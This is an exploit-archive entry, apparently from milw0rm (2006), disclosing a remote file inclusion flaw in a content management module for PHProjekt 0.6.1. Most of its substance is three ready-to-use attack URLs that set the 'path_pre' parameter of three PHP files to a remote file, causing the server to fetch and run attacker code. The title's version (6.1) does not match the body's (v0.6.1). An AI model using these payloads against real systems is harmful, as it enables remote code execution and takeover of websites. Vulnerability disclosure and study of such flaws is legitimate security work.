PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions



EKU-ID: 10240 CVE: OSVDB-ID:
Author: the master Published: 2006-08-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


########################################################################
#  Content management module for PHProjekt v0.6.1  Remote File Inclusion Vulnerability
#
#  Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.tar.gz
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-21]